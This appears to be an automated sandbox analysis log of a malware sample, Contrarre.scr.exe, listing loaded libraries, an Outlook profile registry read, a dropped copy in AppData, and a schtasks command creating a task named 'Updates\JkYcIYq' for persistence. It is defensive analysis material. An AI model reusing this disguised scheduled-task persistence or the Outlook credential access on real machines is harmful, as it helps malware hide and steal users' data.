Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\Contrarre.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Contrarre.scr.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Contrarre.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Contrarre.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Contrarre.scr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Contrarre.scr.exe	Code function: 0_2_0572F7FF push ecx; iretd	0_2_0572F855
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Code function: 0_2_0572F80B push ecx; iretd	0_2_0572F855
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Code function: 0_2_0A142798 pushfd ; ret	0_2_0A1427A5
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Code function: 0_2_0A144491 pushad ; ret	0_2_0A14449D
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Code function: 0_2_0B8B036B push ecx; ret	0_2_0B8B036C
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Code function: 8_2_0146B3A8 push eax; iretd	8_2_0146B445
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_02664600 push esp; ret	9_2_0266460E
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_02662ACF push esp; ret	9_2_02662AD7
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_02662B4A push esp; ret	9_2_02662B4B
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_02664B21 push esp; ret	9_2_02664B2E
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_02662BC9 push esp; ret	9_2_02662BCA
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_0266281D push esp; ret	9_2_0266281E
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_02664E91 push esp; ret	9_2_02664E9E
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_02662F4B push ecx; ret	9_2_02662F4C
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_02662C21 push esp; ret	9_2_02662C22
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_02663213 push esp; ret	9_2_0266321B
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_026657D1 push ecx; ret	9_2_026657DE
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_02663416 push esp; ret	9_2_02663417
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_02669A33 push ebx; retf	9_2_02669A3A
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_02669A30 push ebx; retf	9_2_02669A32
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_02669B0F push esp; retf	9_2_02669B12
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_02669B08 push esp; retf	9_2_02669B0E
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_02669BCB push edi; retf	9_2_02669BD2
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_02669BC9 push edi; retf	9_2_02669BCA
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_02665BD1 push ecx; ret	9_2_02665BDE
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_02663948 push ecx; ret	9_2_02663956
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Code function: 9_2_0925036B push ecx; ret	9_2_0925036C

Source: Contrarre.scr.exe	Static PE information: section name: .text entropy: 7.434579570997436
Source: JkYcIYq.exe.0.dr	Static PE information: section name: .text entropy: 7.434579570997436

Source: C:\Users\user\Desktop\Contrarre.scr.exe

File created: C:\Users\user\AppData\Roaming\JkYcIYq.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Contrarre.scr.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JkYcIYq" /XML "C:\Users\user\AppData\Local\Temp\tmp3B82.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
